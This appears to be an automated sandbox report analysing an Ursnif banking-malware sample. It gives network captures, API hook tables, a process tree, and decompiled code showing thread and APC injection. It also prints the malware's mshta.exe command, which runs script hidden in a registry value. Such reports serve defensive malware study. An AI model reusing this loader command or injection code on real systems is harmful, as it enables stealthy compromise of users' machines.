39 4a 72 53 38 74 48 75 47 51 5a 39 72 6e 76 49 72 7a 31 5a 46 7a 4e 54 53 68 70 49 4d 38 73 55 42 35 70 58 75 45 4f 4e 35 7a 37 6e 50 73 5a 36 2f 59 49 48 4d 64 74 6d 6a 35 7a 77 63 49 41 35 6a 50 2b 35 6e 4b 52 67 74 73 74 47 4b 42 62 58 55 75 77 74 59 78 68 5a 52 4f 41 54 52 43 66 39 65 7a 39 52 7a 56 4f 76 48 41 69 73 4a 48 78 73 6b 50 48 72 4b 2f 64 6b 58 62 72 64 43 70 49 50 32 71 2b 6d 52 4b 32 64 45 34 35 2b 2b 44 53 4d 46 69 6f 44 66 7a 64 63 68 54 51 75 7a 62 5a 63 62 71 4b 61 4d 55 44 73 49 36 37 30 6a 38 74 47 64 37 4b 2b 48 73 49 6e 5a 71 4c 41 65 76 46 59 5a 48 2f 55 42 57 74 49 49 49 42 2b 43 47 6c 6a 52 39 54 64 53 30 4e 62 75 70 4a 4a 41 6f 4a 52 69 61 46 45 65 57 49 73 6e 46 31 5a 36 59 34 34 63 57 75 59 64 78 53 30 4c 67 6a 57 4a 4c 70 67 61 58 6b 54 59 50 50 6a 41 73 4f 61 35 31 2f 41 41 79 76 30 38 56 68 59 6d 6e 79 78 38 49 44 34 75 71 79 4c 57 44 4e 70 32 4f 71 39 79 45 36 72 55 38 68 56 70 44 36 30 44 75 5a 50 35 46 5a 61 54 47 30 76 38 4a 34 42 6d 6c 71 62 2b 72 41 6c 30 42 42 33 66 71 70 48 58 71 55 47 30 51 2b 54 50 49 6b 6b 61 66 73 41 37 38 4b 70 49 64 6c 53 65 59 4d 74 33 70 38 78 4c 30 35 4b 70 74 6e 6c 48 31 6f
                                              Data Ascii: lb6uuK1y9j0US0u0slQVtxR0XfIxYVIVIt/oBTfnQqfIX7ba2uI68MNy+03NuaFUzauokUjWiMSjtYsZXb+AMLp1GXZt/ddE0VHZ8K5JFB8ChIPdudwwZZKFmQFEVo1+XFOMTOc/UIGZibW0TI9pWbXv0TZfFvLhjEJbqCCTAyKftQinPTF4c/UyAqpNAQcQUSRltXfs+oqSF98OxNtZS2KIgzNiZtlUbJLVIZk4wsZbOhSKaNHQc2dIP7fL6ov0JLI0MPk6yHT168dkFzu4Eg2u6Ht7Jh8i9n7aPZsj+KIl5cnEAHOS4W9tqbmf7+21/D2dzePi2wQLlYvnngBr1nUejSNkuEExZSFvF5QVcbC707R5PT1Hjv/lWVS1A865eTONgm+dh0JlCi/qZ3iCy2G92Liwt6PGIdKm5H8NIKpglUF4lPsyk6FW3MkvJ5sSAifRmhgKaCvlRLuhEAuI9NoyHdMfhO218mrKWgB4y4+Ez9JrS8tHuGQZ9rnvIrz1ZFzNTShpIM8sUB5pXuEON5z7nPsZ6/YIHMdtmj5zwcIA5jP+5nKRgtstGKBbXUuwtYxhZROATRCf9ez9RzVOvHAisJHxskPHrK/dkXbrdCpIP2q+mRK2dE45++DSMFioDfzdchTQuzbZcbqKaMUDsI670j8tGd7K+HsInZqLAevFYZH/UBWtIIIB+CGljR9TdS0NbupJJAoJRiaFEeWIsnF1Z6Y44cWuYdxS0LgjWJLpgaXkTYPPjAsOa51/AAyv08VhYmnyx8ID4uqyLWDNp2Oq9yE6rU8hVpD60DuZP5FZaTG0v8J4Bmlqb+rAl0BB3fqpHXqUG0Q+TPIkkafsA78KpIdlSeYMt3p8xL05KptnlH1o
                                              Apr 12, 2021 15:25:08.888151884 CEST6155INData Raw: 4d 59 4f 2b 38 6a 51 59 52 7a 50 77 4a 48 4f 6e 57 5a 43 67 44 69 41 43 6a 63 7a 30 35 41 71 67 4d 58 74 62 2b 58 6f 59 51 52 36 4c 4d 63 53 32 30 6f 52 4d 64 73 7a 37 4a 37 79 53 6e 76 5a 73 74 4b 4f 34 4c 75 79 59 66 56 78 6e 4b 64 48 37 4b 35
                                              Data Ascii: MYO+8jQYRzPwJHOnWZCgDiACjcz05AqgMXtb+XoYQR6LMcS20oRMdsz7J7ySnvZstKO4LuyYfVxnKdH7K5y6EoXBZ9Mzc93ZIHX95YEP80Dz/l/kOTMYwJn0lPWpNvQpG3GL22PE/oJScV9MKWimFkBnrc3Rpo3f4dinFw87JXWCYecXl/vADLM0V93AXQeW670wYnWm357NZ8dvkOH8+O+I5l3ZldTTX+ykN8HdLUGiwqsmLGm
                                              Apr 12, 2021 15:25:08.888168097 CEST6155INData Raw: 44 67 78 74 30 7a 57 62 73 50 6d 78 4a 61 63 51 47 61 6b 6b 4c 78 30 67 75 4d 6c 51 38 30 54 74 64 41 4d 32 47 74 77 7a 4e 4c 58 64 41 54 7a 43 57 57 45 50 4e 56 38 69 56 57 43 39 44 2b 59 70 76 6b 35 50 44 56 31 6a 68 36 4b 35 51 72 57 2f 56 76
                                              Data Ascii: Dgxt0zWbsPmxJacQGakkLx0guMlQ80TtdAM2GtwzNLXdATzCWWEPNV8iVWC9D+Ypvk5PDV1jh6K5QrW/Vv1rW7qbsr0Qjg4yvVe9A85mce0LVMAzTQoHsjJftIvU8bNLt7DiTdIe6E82/32jA7MM7ZtWalIhDLUJzV8gdf3mkv+iuOlXJMM2AX3Q70VwK1hKLtpUJthrIPcvz86jrApreEMzH4Net2uht/YpPoeT58Fd0SC5zUl


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              CreateProcessAsUserWEATexplorer.exe
                                              CreateProcessAsUserWINLINEexplorer.exe
                                              CreateProcessWEATexplorer.exe
                                              CreateProcessWINLINEexplorer.exe
                                              CreateProcessAEATexplorer.exe
                                              CreateProcessAINLINEexplorer.exe
                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: KERNEL32.DLL
                                              Function NameHook TypeNew Data
                                              CreateProcessAsUserWEAT7FFB70FF521C
                                              CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                              CreateProcessWEAT7FFB70FF5200
                                              CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                              CreateProcessAEAT7FFB70FF520E
                                              CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFB70FF5200
                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT62B776C
                                              Process: explorer.exe, Module: WININET.dll
                                              Function NameHook TypeNew Data
                                              api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFB70FF5200
                                              api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT62B776C

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:15:23:08
                                              Start date:12/04/2021
                                              Path:C:\Users\user\Desktop\a.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\a.exe'
                                              Imagebase:0x6b0000
                                              File size:1878352 bytes
                                              MD5 hash:6321729B9F33FEA55483FBB3792C611B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.238889051.00000000030EA000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:15:23:20
                                              Start date:12/04/2021
                                              Path:C:\Users\user\Desktop\a.exe
                                              Wow64 process (32bit):true
                                              Commandline:{path}
                                              Imagebase:0x5e0000
                                              File size:1878352 bytes
                                              MD5 hash:6321729B9F33FEA55483FBB3792C611B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.462274472.0000000001B4C000.00000004.00000040.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.362892848.0000000001D48000.00000004.00000040.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.362944534.0000000001D48000.00000004.00000040.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.363046153.0000000001D48000.00000004.00000040.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.362984170.0000000001D48000.00000004.00000040.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.362843477.0000000001D48000.00000004.00000040.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.363021516.0000000001D48000.00000004.00000040.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.363119118.0000000001D48000.00000004.00000040.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.363077727.0000000001D48000.00000004.00000040.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:15:24:14
                                              Start date:12/04/2021
                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                              Imagebase:0x7ff6813e0000
                                              File size:823560 bytes
                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:15:24:15
                                              Start date:12/04/2021
                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6752 CREDAT:17410 /prefetch:2
                                              Imagebase:0x9f0000
                                              File size:822536 bytes
                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:15:25:00
                                              Start date:12/04/2021
                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                              Imagebase:0x7ff6813e0000
                                              File size:823560 bytes
                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:15:25:01
                                              Start date:12/04/2021
                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:17410 /prefetch:2
                                              Imagebase:0x9f0000
                                              File size:822536 bytes
                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:15:25:04
                                              Start date:12/04/2021
                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:82948 /prefetch:2
                                              Imagebase:0x9f0000
                                              File size:822536 bytes
                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:15:25:07
                                              Start date:12/04/2021
                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5704 CREDAT:17430 /prefetch:2
                                              Imagebase:0x9f0000
                                              File size:822536 bytes
                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:15:25:13
                                              Start date:12/04/2021
                                              Path:C:\Windows\System32\mshta.exe
                                              Wow64 process (32bit):
                                              Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hpuv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hpuv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
                                              Imagebase:
                                              File size:14848 bytes
                                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Executed Functions

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00EADFC8
                                                • GetCurrentThread.KERNEL32 ref: 00EAE005
                                                • GetCurrentProcess.KERNEL32 ref: 00EAE042
                                                • GetCurrentThreadId.KERNEL32 ref: 00EAE09B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236870947.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 12754967449c25007e7e215dddbd7cb526fe03d15fbfd7eda94e377b312c0bb1
                                                • Instruction ID: 3a37da3e64726ad019abeaa245044333877d57bb684ec61a00f7f51bc3b352b7
                                                • Opcode Fuzzy Hash: 12754967449c25007e7e215dddbd7cb526fe03d15fbfd7eda94e377b312c0bb1
                                                • Instruction Fuzzy Hash: DA5154B0D006088FDB10EFAAD988BEEBBF5AF89314F208459E409B7751D7746844CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050F27EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.243300754.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 0cab08cf2f8f1c0a1c674d4df8a8363af624b7c04f36542bc3b12ec262a82714
                                                • Instruction ID: e192c7d867418cad6eaea7dff3c3ffeb3af281a1851877889fab29dd0e720762
                                                • Opcode Fuzzy Hash: 0cab08cf2f8f1c0a1c674d4df8a8363af624b7c04f36542bc3b12ec262a82714
                                                • Instruction Fuzzy Hash: DE41CFB5D00309DFDB14CF9AD884ADEBBB5BF88310F64812AE519AB210D7759845CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00EA5D39
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236870947.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 5d084a2ac1c8abd5cd9c5d5c6ee91b35bd7e9ecc713b49a58842de9a4d633c72
                                                • Instruction ID: ea78bc2662cbd5048014f3820e018cf66da69aae7439b89a10d2221947e2ba00
                                                • Opcode Fuzzy Hash: 5d084a2ac1c8abd5cd9c5d5c6ee91b35bd7e9ecc713b49a58842de9a4d633c72
                                                • Instruction Fuzzy Hash: EF41F1B1C00618CBDB24DFA9C988BDEBBB5BF89308F20805AE509BB251DB756945CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 050F4D51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.243300754.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 241ef3ceb21d2a4c1173956d645fe7095046fb46cb58d936492fea63ba6f4289
                                                • Instruction ID: 521ec737cb30e4af7523fb5d1648e1786e0e49bc5d5924573e6fe4f7b4186e99
                                                • Opcode Fuzzy Hash: 241ef3ceb21d2a4c1173956d645fe7095046fb46cb58d936492fea63ba6f4289
                                                • Instruction Fuzzy Hash: 25414AB4900609CFCB14CF59D448AAFBBF5FF88314F148449E619AB721D774A841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00EA5D39
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236870947.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 489f8cfada87fc7dfca963147d5583a5b995f140fcb5abc3b50e8397f2b6d818
                                                • Instruction ID: a12fe73a663203b89cbc6897628e61dc528b6cb0646a8fc3bb21e189d3e25b5d
                                                • Opcode Fuzzy Hash: 489f8cfada87fc7dfca963147d5583a5b995f140fcb5abc3b50e8397f2b6d818
                                                • Instruction Fuzzy Hash: 6341F2B1C0461CCBDB24DFA9C9487DEBBB5BF89308F208069E509BB251DB756945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,03BE40F8,02C2B04C,?,00000000), ref: 050F00FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.243300754.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 7eef5944cbd612fd440f8ea95f5021ab62b05147144ee30b029028d3b09c0203
                                                • Instruction ID: ce3bcfd51f58066fe0c9f200d9963e11bb36c59782ee17d2a392fe669c70975b
                                                • Opcode Fuzzy Hash: 7eef5944cbd612fd440f8ea95f5021ab62b05147144ee30b029028d3b09c0203
                                                • Instruction Fuzzy Hash: 282179303006119FE758EB29D85AB2E73EABF89710F148129E106DB7A6DB75EC01CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EAE217
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236870947.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 5d84dc58d3dd94f4e10da435c34d0cd92fc5498443dd6aa00d7de0cdbcdfae55
                                                • Instruction ID: a0d02b54f554fb2facab0bec1d1d5eddc3bfce7ecb7b2968816a62f164b5c6ab
                                                • Opcode Fuzzy Hash: 5d84dc58d3dd94f4e10da435c34d0cd92fc5498443dd6aa00d7de0cdbcdfae55
                                                • Instruction Fuzzy Hash: 9721C2B5D002089FDB10CFAAD984ADEBBF8EB48324F14841AE915A7310D375A954CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00EABF31,00000800,00000000,00000000), ref: 00EAC142
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236870947.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: c5b679ff7fdd7945428f7851632142c57e14fa96cc9bbc6c2c83180165027952
                                                • Instruction ID: bc208d559cfd6a556f932fed88f30bd514f7f8f23fedcb3d3bd50d74d3607745
                                                • Opcode Fuzzy Hash: c5b679ff7fdd7945428f7851632142c57e14fa96cc9bbc6c2c83180165027952
                                                • Instruction Fuzzy Hash: 0F1136B19042088FCB10CF9AC448ADEBBF4EB99324F10802AE515B7600C375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EABEB6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236870947.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2e78c54082de4e751efa9661d9ffe39c160fac9c1a6de249f93b1cd40306becc
                                                • Instruction ID: 7725e0080cb1eadbb61062700f9ed36c74640422ca839dbd7968ebf1c2499129
                                                • Opcode Fuzzy Hash: 2e78c54082de4e751efa9661d9ffe39c160fac9c1a6de249f93b1cd40306becc
                                                • Instruction Fuzzy Hash: 02110FB2C002498FCB10DF9AC444BDEFBF4AB89324F10841AD529B7700C375A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetWindowLongW.USER32(?,?,?), ref: 050F297D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.243300754.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                                Similarity
                                                • API ID: LongWindow
                                                • String ID:
                                                • API String ID: 1378638983-0
                                                • Opcode ID: 160e526fbe65e857e9b841a45780e1c29a5916e48d7371d32919f1de044faea5
                                                • Instruction ID: 00c40df1e837a9b6226e07fdaa4546cef0a29ba1aaa153f6e2fe6dcb99054d31
                                                • Opcode Fuzzy Hash: 160e526fbe65e857e9b841a45780e1c29a5916e48d7371d32919f1de044faea5
                                                • Instruction Fuzzy Hash: 241115B58042098FDB10DF9AD888BDEBBF8EB88320F10841AE915A7700C374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Executed Functions

                                                C-Code - Quality: 84%
                                                			E0040140E(void* __edi) {
                                                				long _v8;
                                                				long _v12;
                                                				struct _SYSTEMTIME _v28;
                                                				void* _v52;
                                                				long _t24;
                                                				int _t26;
                                                				long _t29;
                                                				long _t30;
                                                				void* _t33;
                                                				long _t36;
                                                				long _t37;
                                                				long _t41;
                                                				void* _t44;
                                                				intOrPtr _t47;
                                                				signed int _t52;
                                                				void* _t57;
                                                				signed int _t60;
                                                				void* _t63;
                                                				intOrPtr* _t64;
                                                
                                                				_t24 = E00401AFF();
                                                				_v8 = _t24;
                                                				if(_t24 != 0) {
                                                					return _t24;
                                                				}
                                                				do {
                                                					GetSystemTime( &_v28);
                                                					_t26 = SwitchToThread();
                                                					asm("cdq");
                                                					_t52 = 9;
                                                					_t60 = _t26 + (_v28.wMilliseconds & 0x0000ffff) % _t52;
                                                					_t29 = E00401000(__edi, _t60); // executed
                                                					_v8 = _t29;
                                                					Sleep(_t60 << 5); // executed
                                                					_t30 = _v8;
                                                				} while (_t30 == 0xc);
                                                				if(_t30 != 0) {
                                                					L20:
                                                					return _t30;
                                                				}
                                                				_push(__edi);
                                                				if(E004016A0(_t52,  &_v12) != 0) {
                                                					 *0x4030f8 = 0;
                                                					L10:
                                                					_t33 = CreateThread(0, 0, __imp__SleepEx,  *0x403100, 0, 0); // executed
                                                					_t63 = _t33;
                                                					if(_t63 == 0) {
                                                						L17:
                                                						_v8 = GetLastError();
                                                						L18:
                                                						_t30 = _v8;
                                                						if(_t30 == 0xffffffff) {
                                                							_t30 = GetLastError();
                                                						}
                                                						goto L20;
                                                					}
                                                					_t36 = QueueUserAPC(E00401B73, _t63,  &_v52); // executed
                                                					if(_t36 == 0) {
                                                						_t41 = GetLastError();
                                                						_v12 = _t41;
                                                						TerminateThread(_t63, _t41);
                                                						CloseHandle(_t63);
                                                						_t63 = 0;
                                                						SetLastError(_v12);
                                                					}
                                                					if(_t63 == 0) {
                                                						goto L17;
                                                					} else {
                                                						_t37 = WaitForSingleObject(_t63, 0xffffffff);
                                                						_v8 = _t37;
                                                						if(_t37 == 0) {
                                                							GetExitCodeThread(_t63,  &_v8);
                                                						}
                                                						CloseHandle(_t63);
                                                						goto L18;
                                                					}
                                                				}
                                                				_t64 = __imp__GetLongPathNameW;
                                                				_t44 =  *_t64(_v12, 0, 0); // executed
                                                				_t57 = _t44;
                                                				if(_t57 == 0) {
                                                					L8:
                                                					 *0x4030f8 = _v12;
                                                					goto L10;
                                                				}
                                                				_t13 = _t57 + 2; // 0x2
                                                				_t47 = E00401C27(_t57 + _t13);
                                                				 *0x4030f8 = _t47;
                                                				if(_t47 == 0) {
                                                					goto L8;
                                                				}
                                                				 *_t64(_v12, _t47, _t57); // executed
                                                				E00401722(_v12);
                                                				goto L10;
                                                			}






















                                                0x00401415
                                                0x0040141e
                                                0x00401421
                                                0x0040154c
                                                0x0040154c
                                                0x00401428
                                                0x0040142c
                                                0x00401432
                                                0x00401440
                                                0x00401441
                                                0x00401444
                                                0x00401447
                                                0x00401450
                                                0x00401453
                                                0x00401459
                                                0x0040145c
                                                0x00401463
                                                0x00401549
                                                0x00000000
                                                0x00401549
                                                0x00401469
                                                0x00401475
                                                0x004014b8
                                                0x004014be
                                                0x004014ce
                                                0x004014d4
                                                0x004014de
                                                0x00401539
                                                0x0040153b
                                                0x0040153e
                                                0x0040153e
                                                0x00401545
                                                0x00401547
                                                0x00401547
                                                0x00000000
                                                0x00401545
                                                0x004014ea
                                                0x004014f8
                                                0x004014fa
                                                0x004014fe
                                                0x00401501
                                                0x00401508
                                                0x0040150d
                                                0x0040150f
                                                0x0040150f
                                                0x00401517
                                                0x00000000
                                                0x00401519
                                                0x0040151c
                                                0x00401524
                                                0x00401527
                                                0x0040152e
                                                0x0040152e
                                                0x00401535
                                                0x00000000
                                                0x00401535
                                                0x00401517
                                                0x00401477
                                                0x00401482
                                                0x00401484
                                                0x00401488
                                                0x004014ae
                                                0x004014b1
                                                0x00000000
                                                0x004014b1
                                                0x0040148a
                                                0x0040148f
                                                0x00401496
                                                0x0040149b
                                                0x00000000
                                                0x00000000
                                                0x004014a2
                                                0x004014a7
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00401AFF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040141A), ref: 00401B0E
                                                  • Part of subcall function 00401AFF: GetVersion.KERNEL32 ref: 00401B1D
                                                  • Part of subcall function 00401AFF: GetCurrentProcessId.KERNEL32 ref: 00401B34
                                                  • Part of subcall function 00401AFF: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401B4D
                                                • GetSystemTime.KERNEL32(?,00000000), ref: 0040142C
                                                • SwitchToThread.KERNEL32 ref: 00401432
                                                  • Part of subcall function 00401000: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000000,?,00000000,00000000), ref: 00401056
                                                  • Part of subcall function 00401000: memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?,0040144C,00000000), ref: 004010E8
                                                  • Part of subcall function 00401000: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401103
                                                • Sleep.KERNELBASE(00000000,00000000), ref: 00401453
                                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401482
                                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004014A2
                                                • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000), ref: 004014CE
                                                • QueueUserAPC.KERNELBASE(00401B73,00000000,?), ref: 004014EA
                                                • GetLastError.KERNEL32 ref: 004014FA
                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 00401501
                                                • CloseHandle.KERNEL32(00000000), ref: 00401508
                                                • SetLastError.KERNEL32(?), ref: 0040150F
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040151C
                                                • GetExitCodeThread.KERNEL32(00000000,?), ref: 0040152E
                                                • CloseHandle.KERNEL32(00000000), ref: 00401535
                                                • GetLastError.KERNEL32 ref: 00401539
                                                • GetLastError.KERNEL32 ref: 00401547
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
                                                • String ID:
                                                • API String ID: 2478182988-0
                                                • Opcode ID: c48a0196bba6bebb72ee43f7a27d8253c9da1ef4f4ce3c643ec66038986f6515
                                                • Instruction ID: 35f9caca6ccb7d71969b9bfeeed6248ae3a393b3f533e2a30eff2f04d51f4941
                                                • Opcode Fuzzy Hash: c48a0196bba6bebb72ee43f7a27d8253c9da1ef4f4ce3c643ec66038986f6515
                                                • Instruction Fuzzy Hash: 7F318D71900218BFDB11AFA49E88CAE7BBCEA483547114136F615F32B0E7788E40DB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E004015F8(intOrPtr* __eax, void** _a4) {
                                                				int _v12;
                                                				void* _v16;
                                                				void* _v20;
                                                				void* _v24;
                                                				int _v28;
                                                				int _v32;
                                                				intOrPtr _v36;
                                                				int _v40;
                                                				int _v44;
                                                				void* _v48;
                                                				void* __esi;
                                                				long _t34;
                                                				void* _t39;
                                                				void* _t47;
                                                				intOrPtr* _t48;
                                                
                                                				_t48 = __eax;
